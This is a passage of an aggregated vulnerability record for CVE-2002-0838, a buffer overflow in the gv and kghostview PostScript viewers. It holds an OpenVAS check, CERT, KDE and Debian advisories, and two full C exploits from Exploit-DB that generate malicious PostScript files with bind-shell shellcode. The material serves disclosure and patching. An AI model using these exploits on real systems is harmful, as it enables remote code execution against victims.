kdegraphics\nannounced via advisory DSA 182-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:53756", "href": "http://plugins.openvas.org/nasl.php?oid=53756", "type": "openvas", "title": "Debian Security Advisory DSA 182-1 (kdegraphics)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_182_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 182-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Zen-parse discovered a buffer overflow in gv, a PostScript and PDF\nviewer for X11. The same code is present in kghostview which is part\nof the KDE-Graphics package. This problem is triggered by scanning\nthe PostScript file and can be exploited by an attacker sending a\nmalformed PostScript or PDF file. The attacker is able to cause\narbitrary code to be run with the privileges of the victim.\n\nThis problem has been fixed in version 2.2.2-6.8 for the current\nstable distribution (woody) and in version 2.2.2-6.9 for the unstable\ndistribution (sid). The old stable distribution (potato) is not\naffected since no KDE is included.\n\nWe recommend that you upgrade your kghostview package.\";\ntag_summary = \"The remote host is missing an update to kdegraphics\nannounced via advisory DSA 182-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20182-1\";\n\nif(description)\n{\n script_id(53756);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:24:46 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2002-0838\");\n script_bugtraq_id(5808);\n script_tag(name:\"cvss_base\", value:\"4.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 182-1 (kdegraphics)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"kghostview\", ver:\"2.2.2-6.8\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cert": [{"lastseen": "2020-09-18T20:44:18", "bulletinFamily": "info", "cvelist": ["CVE-2002-0838"], "description": "### Overview \n\nA remotely exploitable buffer overflow vulnerability exists in gv.\n\n### Description \n\nA remotely exploitable buffer overflow vulnerability exists in gv. [gv](<http://wwwthep.physik.uni-mainz.de/~plass/gv/>) allows a user to view and navigate PostScript and PDF documents by providing an interface to the ghostscript interpreter. This vulnerability can allow a remote attacker to execute arbitrary code on a vulnerable host. \n \n--- \n \n### Impact \n\nA remote attacker can execute arbitrary code on a vulnerable host with the privileges of the victim. \n \n--- \n \n### Solution \n\nApply a patch. \n \n--- \n \n### Vendor Information\n\n600777\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Debian __ Affected\n\nUpdated: October 17, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\n<http://www.debian.org/security/2002/dsa-176>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23600777 Feedback>).\n\n### Gentoo Linux __ Affected\n\nUpdated: October 17, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\n`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n`\n\n`- - -------------------------------------------------------------------- \nGENTOO LINUX SECURITY ANNOUNCEMENT 200210-003 \n- - -------------------------------------------------------------------- \n` \n`PACKAGE : ggv \nSUMMARY?: buffer overflow \nEXPLOIT : local \nDATE ?? : 2002-10-17 08:30 UTC \n` \n`- - -------------------------------------------------------------------- \n` \n`ggv shares the same buffer overflow problem that gv did. \n` \n`Read the full advisory at \n``<http://www.idefense.com/advisory/09.26.02.txt>`` \n` \n`SOLUTION \n` \n`It is recommended that all Gentoo Linux users who are running \napp-text/ggv-1.99.90 and earlier update their systems \nas follows: \n` \n`emerge rsync \nemerge ggv \nemerge clean \n` \n`- - -------------------------------------------------------------------- \naliz@gentoo.org - GnuPG key is available at www.gentoo.org/~aliz \n- - -------------------------------------------------------------------- \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.0.7 (GNU/Linux) \n` \n`iD8DBQE9rnUQfT7nyhUpoZMRAr6jAKCNU3Ko5pluB0bZ3yIlw4paUyrh1ACgqQbf \nCvBJCihfTpuMWwci2+Rhn78= \n=mnVF \n-----END PGP SIGNATURE-----`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23600777 Feedback>).\n\n### KDE Desktop Environment Project __ Affected\n\nUpdated: October 17, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\n<http://www.kde.org/info/security/advisory-20021008-1.txt>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23600777 Feedback>).\n\n### Red Hat Inc. __ Affected\n\nUpdated: October 17, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\n<http://rhn.redhat.com/errata/RHSA-2002-207.html>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23600777 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://www.idefense.com/advisory/09.26.02.txt>\n * <http://wwwthep.physik.uni-mainz.de/~plass/gv/>\n * <http://rhn.redhat.com/errata/RHSA-2002-207.html>\n * [http://marc.theaimsgroup.com/?l=bugtraq&m=103305615613319&w=2](<http://marc.theaimsgroup.com/?l=bugtraq&m=103305615613319&w=2>)\n\n### Acknowledgements\n\nThanks to David Endler for reporting this vulnerability.\n\nThis document was written by Ian A Finlay.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2002-0838](<http://web.nvd.nist.gov/vuln/detail/CVE-2002-0838>) \n---|--- \n**Severity Metric:** | 16.50 \n**Date Public:** | 2002-09-26 \n**Date First Published:** | 2002-10-17 \n**Date Last Updated: ** | 2002-10-17 20:02 UTC \n**Document Revision: ** | 14 \n", "modified": "2002-10-17T20:02:00", "published": "2002-10-17T00:00:00", "id": "VU:600777", "href": "https://www.kb.cert.org/vuls/id/600777", "type": "cert", "title": "gv contains buffer overflow in sscanf() function", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-02T17:27:59", "description": "GV 2.x/3.x Malformed PDF/PS File Buffer Overflow Vulnerability (1). CVE-2002-0838. Local exploit for linux platform", "published": "2002-09-26T00:00:00", "type": "exploitdb", "title": "GV 2.x/3.x Malformed PDF/PS File Buffer Overflow Vulnerability 1", "bulletinFamily": "exploit", "cvelist": ["CVE-2002-0838"], "modified": "2002-09-26T00:00:00", "id": "EDB-ID:21871", "href": "https://www.exploit-db.com/exploits/21871/", "sourceData": "source: http://www.securityfocus.com/bid/5808/info\r\n\r\ngv is a freely available, open source Portable Document Format (PDF) and PostScript (PS) viewing utility. It is available for Unix and Linux operating systems.\r\n\r\nIt has been reported that an insecure sscanf() function exists in gv. Due to this function, an attacker may be able to put malicious code in the %%PageOrder: portion of a file. When this malicious file is opened with gv, the code would be executed in the security context of the user opening the file.\r\n\r\n// gv <=3.5.8 remote exploit by priestmaster\r\n#include <stdio.h>\r\n\r\n#define STDALIGN\t264\t// Standard align\r\n#define SCBUF\t\t800\t// Shellcode buffer size\r\n#define GARBAGE\t\t100\t// Garbage for the end\r\n\t\t\t\t// of the evil_buffer\r\n#define NOP\t\t'G'\t// instead of \"\\x90\" \r\n\r\n\r\n// Copyright (c) Ramon de Carvalho Valle\r\n// Bind shell port number 65535\r\nchar bindcode[]= /* 72 bytes */\r\n \"\\x31\\xdb\" /* xorl %ebx,%ebx */\r\n \"\\xf7\\xe3\" /* mull %ebx */\r\n \"\\x53\" /* pushl %ebx */\r\n \"\\x43\" /* incl %ebx */\r\n \"\\x53\" /* pushl %ebx */\r\n \"\\x6a\\x02\" /* pushl $0x02 */\r\n \"\\x89\\xe1\" /* movl %esp,%ecx */\r\n \"\\xb0\\x66\" /* movb $0x66,%al */\r\n \"\\xcd\\x80\" /* int $0x80 */\r\n \"\\xff\\x49\\x02\" /* decl 0x02(%ecx) */\r\n \"\\x6a\\x10\" /* pushl $0x10 */\r\n \"\\x51\" /* pushl %ecx */\r\n \"\\x50\" /* pushl %eax */\r\n \"\\x89\\xe1\" /* movl %esp,%ecx */\r\n \"\\x43\" /* incl %ebx */\r\n \"\\xb0\\x66\" /* movb $0x66,%al */ \r\n \"\\xcd\\x80\" /* int $0x80 */\r\n \"\\x89\\x41\\x04\" /* movl %eax,0x04(%ecx) */\r\n \"\\xb3\\x04\" /* movb $0x04,%bl */\r\n \"\\xb0\\x66\" /* movb $0x66,%al */\r\n \"\\xcd\\x80\" /* int $0x80 */\r\n \"\\x43\" /* incl %ebx */\r\n \"\\xb0\\x66\" /* movb $0x66,%al */\r\n \"\\xcd\\x80\" /* int $0x80 */\r\n \"\\x59\" /* popl %ecx */\r\n \"\\x93\" /* xchgl %eax,%ebx */\r\n \"\\xb0\\x3f\" /* movb $0x3f,%al */\r\n \"\\xcd\\x80\" /* int $0x80 */\r\n \"\\x49\" /* decl %ecx */\r\n \"\\x79\\xf9\" /* jns <bindsocketshellcode+45> */\r\n \"\\x68\\x2f\\x2f\\x73\\x68\" /* pushl $0x68732f2f */\r\n \"\\x68\\x2f\\x62\\x69\\x6e\" /* pushl $0x6e69622f */\r\n \"\\x89\\xe3\" /* movl %esp,%ebx */\r\n \"\\x50\" /* pushl %eax */\r\n \"\\x53\" /* pushl %ebx */\r\n \"\\x89\\xe1\" /* movl %esp,%ecx */ \r\n //\"\\xb0\\x0b\" /* movb $0x0b,%al \t\t */\r\n // 0b isn't allowed (filter). I use xor %eax, %eax\r\n // and eleven inc %al. It's the same as \\xb0\\x0b\r\n \"\\x31\\xc0\\xfe\\xc0\\xfe\\xc0\\xfe\\xc0\\xfe\\xc0\\xfe\\xc0\"\r\n \"\\xfe\\xc0\\xfe\\xc0\\xfe\\xc0\\xfe\\xc0\\xfe\\xc0\\xfe\\xc0\"\r\n \"\\xcd\\x80\"\r\n; \r\n\r\n// How to start the exploit\r\nvoid usage(char *prgname)\r\n{\r\n printf(\"\\nUsage: %s align retaddr \\n\\n\"\r\n \"align (0 on SUSE 7.0)\\n\"\r\n \"retaddr (return address (should point to shellcode))\\n\");\r\n exit(0);\r\n}\r\n\r\n/////////////////////////////////////////\r\n\r\nmain(int argc, char **argv)\r\n{\r\n\tint align;\t// Align for the buffer\r\n\tlong retaddr;\t// return address\r\n\t\r\n\tchar buf[BUFSIZ];\t// The evil buffer\r\n\tchar *p;\t\t// Pointer to evil buffer\r\n\r\n\tif(argc != 3)\t\t// 2 Arguments required\r\n\t{\r\n\t\tusage(argv[0]);\r\n\t}\r\n\r\n\t// Get align and return address from parameters\r\n\talign = atoi(argv[1]);\r\n\tretaddr = strtoul(argv[2], 0 , NULL);\r\n\r\n\t/* DEBUG, Shellcode testing\r\n\tvoid (*dsr)();\r\n\t(long) dsr = &bindcode; \r\n\tdsr(); */\r\n\r\n\t// Point to buffer\r\n\tp = buf;\r\n\r\n\t// Memset the buffer with NOP's\r\n\tmemset(p, NOP, BUFSIZ);\r\n\r\n\tp += STDALIGN+align;\r\n\r\n\t// Write return address in buffer (It's a very simple stack overflow).\r\n\t*((void **)p) = (void *) retaddr;\r\n\tp+=4;\r\n\r\n\t// Put shellcode in buffer\r\n\tp+=SCBUF-strlen(bindcode)-1;\r\n\tmemcpy(p, bindcode, strlen(bindcode));\r\n\tp += strlen(bindcode);\r\n\t\r\n\t// Add some garbage to end of buffer\r\n\tp += GARBAGE;\r\n\t\r\n\t// Null terminate buffer\r\n\t*p = 0;\r\n\t\r\n\t// Generate pdf file\r\n\tprintf(\"%%!PS-Adobe-3.0\\n\");\r\n\tprintf(\"%%%%Creator: groff 1.16 (with modifications by zen-parse by hand 1.00a)\\n\");\r\n\tprintf(\"%%%%CreationDate: Sat Jun 15 15:30ish\\n\");\r\n\r\n\t// In page order, the stack overflow occur.\r\n\tprintf(\"%%%%PageOrder: %s\\n\", buf);\r\n\tprintf(\"%%%%EndComments\\n\");\r\n\tprintf(\"%%%%EOF\");\t\r\n}\r\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/21871/"}, {"lastseen": "2016-02-02T17:28:07", "description": "GV 2.x/3.x Malformed PDF/PS File Buffer Overflow Vulnerability (2). CVE-2002-0838. Local exploit for linux platform", "published": "2002-09-26T00:00:00", "type": "exploitdb", "title": "GV 2.x/3.x Malformed PDF/PS File Buffer Overflow Vulnerability 2", "bulletinFamily": "exploit", "cvelist": ["CVE-2002-0838"], "modified": "2002-09-26T00:00:00", "id": "EDB-ID:21872", "href": "https://www.exploit-db.com/exploits/21872/", "sourceData": "source: http://www.securityfocus.com/bid/5808/info\r\n \r\ngv is a freely available, open source Portable Document Format (PDF) and PostScript (PS) viewing utility. It is available for Unix and Linux operating systems.\r\n \r\nIt has been reported that an insecure sscanf() function exists in gv. Due to this function, an attacker may be able to put malicious code in the %%PageOrder: portion of a file. When this malicious file is opened with gv, the code would be executed in the security context of the user opening the file.\r\n\r\n/*\r\n * gv postscript viewer exploit , infamous42md AT hotpop DOT com\r\n *\r\n * run of the mill bof. spawns a remote shell on port 7000. woopty doo. if\r\n * someone has been able to exploit the heap overflow in cfengine, please email\r\n * me and teach me something. after days of pain i've concluded it's not\r\n * possible b/c you can't manipulate the heap enough to get anything good in\r\n * front of you. please prove me wrong so i can learn.\r\n *\r\n * shouts to mitakeet\r\n *\r\n * [n00b@localho.outernet] netstat -ant | grep 7000\r\n * [n00b@localho.outernet] gcc -Wall -o gvown gvown.c\r\n * [n00b@localho.outernet] ./gvown 0xbffff350\r\n * [n00b@localho.outernet] ./gv h4x0ring_sacr3ts_uncuv3red.ps\r\n * [n00b@localho.outernet] netstat -ant | grep 7000\r\n * tcp 0 0 0.0.0.0:7000 0.0.0.0:* LISTEN\r\n */\r\n#include <stdio.h>\r\n#include <sys/types.h>\r\n#include <fcntl.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <string.h>\r\n\r\n#define NOP 0x90\r\n#define NNOPS 512\r\n#define die(x) do{perror(x); exit(EXIT_FAILURE);}while(0)\r\n#define BS 0x10000\r\n#define RETADDR_BYTES 400\r\n#define PS_COMMENT \"%!PS-Adobe- \"\r\n#define OUTFILE \"h4x0ring_sacr3ts_uncuv3red.ps\"\r\n\r\n\r\n/* call them on port 7000, mine */\r\nchar remote[] =\r\n\"\\x31\\xc0\\x50\\x50\\x66\\xc7\\x44\\x24\\x02\\x1b\\x58\\xc6\\x04\\x24\\x02\\x89\\xe6\"\r\n\"\\xb0\\x02\\xcd\\x80\\x85\\xc0\\x74\\x08\\x31\\xc0\\x31\\xdb\\xb0\\x01\\xcd\\x80\\x50\"\r\n\"\\x6a\\x01\\x6a\\x02\\x89\\xe1\\x31\\xdb\\xb0\\x66\\xb3\\x01\\xcd\\x80\\x89\\xc5\\x6a\"\r\n\"\\x10\\x56\\x50\\x89\\xe1\\xb0\\x66\\xb3\\x02\\xcd\\x80\\x6a\\x01\\x55\\x89\\xe1\\x31\"\r\n\"\\xc0\\x31\\xdb\\xb0\\x66\\xb3\\x04\\xcd\\x80\\x31\\xc0\\x50\\x50\\x55\\x89\\xe1\\xb0\"\r\n\"\\x66\\xb3\\x05\\xcd\\x80\\x89\\xc5\\x31\\xc0\\x89\\xeb\\x31\\xc9\\xb0\\x3f\\xcd\\x80\"\r\n\"\\x41\\x80\\xf9\\x03\\x7c\\xf6\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\"\r\n\"\\x69\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\x99\\xb0\\x0b\\xcd\\x80\";\r\n\r\n\r\nint main(int argc, char **argv)\r\n{\r\n int len, x, fd;\r\n char buf[BS];\r\n u_long retaddr;\r\n\r\n if(argc < 2){\r\n fprintf(stderr, \"Usage: %s < retaddr >\\n\", argv[0]);\r\n return EXIT_FAILURE;\r\n }\r\n sscanf(argv[1], \"%lx\", &retaddr);\r\n\r\n /* create 3vil buf */\r\n memset(buf, NOP, BS);\r\n strcpy(buf, PS_COMMENT);\r\n len = strlen(buf);\r\n for(x = 0; x < RETADDR_BYTES - 3; x += sizeof(retaddr))\r\n memcpy(buf+x+len, &retaddr, sizeof(retaddr));\r\n len += x + NNOPS;\r\n strcpy(buf+len, remote);\r\n strcat(buf+len, \"\\n\");\r\n len += strlen(remote) + 1; /* + NULL */\r\n\r\n /* create the 3vil file */\r\n if( (fd = open(OUTFILE, O_RDWR|O_CREAT|O_EXCL, 0666)) < 0)\r\n die(\"open\");\r\n\r\n if(write(fd, buf, len) < 0)\r\n die(\"write\");\r\n\r\n close(fd);\r\n\r\n return 0;\r\n}", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/21872/"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:06", "bulletinFamily": "software", "cvelist": ["CVE-2002-0838"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\nKDE Security Advisory: KGhostview Arbitary Code Execution\r\nOriginal Release Date: 2002-10-08\r\nURL: http://www.kde.org/info/security/advisory-20021008-1.txt\r\n\r\n0. References\r\n\r\n cve.mitre.org: CAN-2002-0838\r\n BUGTRAQ:20020926 iDEFENSE Security Advisory 09.26.2002: \r\n Exploitable Buffer Overflow in gv\r\n http://marc.theaimsgroup.com/?l=bugtraq&m=103305615613319&w=2\r\n\r\n\r\n1. Systems affected:\r\n\r\n KGhostView of any KDE release between KDE 1.1 and KDE 3.0.3a\r\n\r\n2. Overview:\r\n \r\n KGhostview includes a DSC 3.0 parser from GSview, which is vulnerable\r\n to a buffer overflow while parsing a specially crafted .ps input\r\n file. It also contains code from gv 3.5.x which is vulnerable to another \r\n buffer overflow triggered by malformed postscript or Adobe pdf files. \r\n\r\n3. Impact:\r\n \r\n Viewing certain Postscript or PDF files can result in the execution of \r\n arbitary code placed in the file and as a result opens possibilities for\r\n any remote manipulation under the local user account.\r\n \r\n4. Solution:\r\n \r\n Apply the patch listed in section 5 to kdegraphics/kghostview, or update\r\n to KDE 3.0.4. \r\n\r\n kdegraphics-3.0.4 can be downloaded from\r\n\r\n http://download.kde.org/stable/3.0.4 :\r\n\r\n 6065219c825102c843ba582c4a520cac kdegraphics-3.0.4.tar.bz2\r\n\r\n5. Patch:\r\n\r\n A patch for KDE 3.0.3 is available from\r\n \r\n ftp://ftp.kde.org/pub/kde/security_patches :\r\n 9e33962406ac123e4fbdab20b4123ccf post-3.0.3-kdegraphics-kghostview.diff\r\n \r\n A patch for KDE 2.2.2 is available from\r\n \r\n ftp://ftp.kde.org/pub/kde/security_patches : \r\n 62a1178c6a1730cbab98bbc825adafe9 post-2.2.2-kdegraphics-kghostview.diff\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.0.7 (GNU/Linux)\r\n\r\niD8DBQE9pDXDvsXr+iuy1UoRAvfZAKCxyetx90FfIDpTeq028QUEfXM6TwCgjOMl\r\npLaRHeMmf/kUDz9HwpOW6fk=\r\n=w/u0\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2002-10-12T00:00:00", "published": "2002-10-12T00:00:00", "id": "SECURITYVULNS:DOC:3627", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:3627", "title": "KDE Security Advisory: KGhostview Arbitary Code Execution", "type": "securityvulns", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "debian": [{"lastseen": "2019-05-30T02:23:08", "bulletinFamily": "unix", "cvelist": ["CVE-2002-0838"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 176-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nOctober 16th, 2002 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : gv\nVulnerability : buffer overflow\nProblem-Type : remote\nDebian-specific: no\nCVE Id : CAN-2002-0838\nBugTraq ID : 5808\n\nZen-parse discovered a buffer overflow in gv, a PostScript and PDF\nviewer for X11. This problem is triggered by scanning the PostScript\nfile and can be exploited by an attacker sending a malformed\nPostScript or PDF file. The attacker is able to cause arbitrary code\nto be run with the privileges of the victim.\n\nThis problem has been fixed in version 3.5.8-26.1 for the current\nstable distribution (woody), in version 3.5.8-17.1 for the old stable\ndistribution (potato) and version 3.5.8-27 for the unstable\ndistribution (sid).\n\nWe recommend that you upgrade your gv package.\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 2.2 alias potato\n- ---------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-17.1.dsc\n Size/MD5 checksum: 555 3aa3cb663f578cbf02c09f370951a814\n http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-17.1.diff.gz\n Size/MD5 checksum: 29382 2e9e7149b69bf36a80632c8b695b6495\n http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8.orig.tar.gz\n Size/MD5 checksum: 369609 8f2f0bd97395d6cea52926ddee736da8\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-17.1_alpha.deb\n Size/MD5 checksum: 278646 b12dd5fef60ff840b3921a511eb28c74\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-17.1_arm.deb\n Size/MD5 checksum: 238918 52892bea304128845836b4c9976d39a3\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-17.1_i386.deb\n Size/MD5 checksum: 226416 4f44d7df45cec7b132c1c7c9a6ba84ea\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-17.1_m68k.deb\n Size/MD5 checksum: 217712 2decb437f1a28beac92edb63f3d31444\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-17.1_powerpc.deb\n Size/MD5 checksum: 244382 cb3bd27b214e391ada83ce0593e16715\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-17.1_sparc.deb\n Size/MD5 checksum: 237878 ba1bdf19f68f62d36c8f58c015867287\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-26.1.dsc\n Size/MD5 checksum: 559 e7a2b5dfb91d7217d1b171b24682ea41\n http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-26.1.diff.gz\n Size/MD5 checksum: 18453 f9910a58912e1a6fbaef33ff4fe27b94\n http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8.orig.tar.gz\n Size/MD5 checksum: 369609 8f2f0bd97395d6cea52926ddee736da8\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-26.1_alpha.deb\n Size/MD5 checksum: 273262 6cb8adebf56cc25ef43d1358636dc9ca\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-26.1_arm.deb\n Size/MD5 checksum: 243382 2707a8a87e133a45cc2a98dd223e7c8f\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-26.1_i386.deb\n Size/MD5 checksum: 226106 304f32b84e6497612222a26c9dc5c1fd\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-26.1_ia64.deb\n Size/MD5 checksum: 313888 522c58c4d2fecb99424533c4980d1409\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-26.1_hppa.deb\n Size/MD5 checksum: 252054 aa50a00ebb6d5c304ec94bbf1e65a2c9\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-26.1_m68k.deb\n Size/MD5 checksum: 216922 d11c3c10e70fb1593ce15c2b6c3863be\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-26.1_mips.deb\n Size/MD5 checksum: 252064 6b944b4c04f4488ea380063bdf3324ad\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-26.1_mipsel.deb\n Size/MD5 checksum: 250914 87afee172cf73ed91ad0449fadd9bb4b\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-26.1_powerpc.deb\n Size/MD5 checksum: 243450 9c77e9860e1044bc4c7b9a7b054e8a4d\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-26.1_s390.deb\n Size/MD5 checksum: 232784 96242f88c593319e0d3fddef928c47d2\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/g/gv/gv_3.5.8-26.1_sparc.deb\n Size/MD5 checksum: 237798 e5091427da6e76dbb9bb34cf03e94647\n\n\n These files will probably be moved into the stable distribution on\n its next revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "edition": 2, "modified": "2002-10-16T00:00:00", "published": "2002-10-16T00:00:00", "id": "DEBIAN:DSA-176-1:0B654", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2002/msg00099.html", "title": "[SECURITY] [DSA 176-1] New gv packages fix buffer overflow", "type": "debian", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T02:22:57", "bulletinFamily": "unix", "cvelist": ["CVE-2002-0838"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 182-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nOctober 28th, 2002 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : kdegraphics\nVulnerability : buffer overflow\nProblem-Type : remote\nDebian-specific: no\nCVE Id : CAN-2002-0838\nBugTraq ID : 5808\n\nZen-parse discovered a buffer overflow in gv, a PostScript and PDF\nviewer for X11. The same code is present in kghostview which is part\nof the KDE-Graphics package. This problem is triggered by scanning\nthe PostScript file and can be exploited by an attacker sending a\nmalformed PostScript or PDF file. The attacker is able to cause\narbitrary code to be run with the privileges of the victim.\n\nThis problem has been fixed in version 2.2.2-6.8 for the current\nstable distribution (woody) and in version 2.2.2-6.9 for the unstable\ndistribution (sid). The old stable distribution (potato) is not\naffected since no KDE is included.\n\nWe recommend that you upgrade your kghostview package.\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the 